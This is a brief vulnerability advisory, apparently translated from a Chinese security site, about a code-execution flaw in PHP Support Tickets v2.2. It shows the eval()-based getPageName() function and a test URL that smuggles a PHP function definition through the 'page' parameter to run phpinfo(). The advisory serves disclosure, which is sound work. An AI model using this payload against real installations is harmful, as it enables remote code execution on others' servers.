PHP Support Tickets v2. 2 code implementation of defect and repair-vulnerability warning-the black bar safety net

ID MYHACK58:62201131837
Type myhack58
Reporter 佚名
Modified 2011-09-14T00:00:00


Title: PHP Support Tickets v2. 2 Code Exec

Author: brain[pillow] Developer website: Affected version: 2.2 Defect code analysis:


public function getPageName() {

return eval('return PHPST_PAGENAME_' . strtoupper($this->page) . ';');


==================================================================== Test:

/index. php? page=xek();function PHPST_PAGENAME_XEK(){phpinfo();}

Fix: filter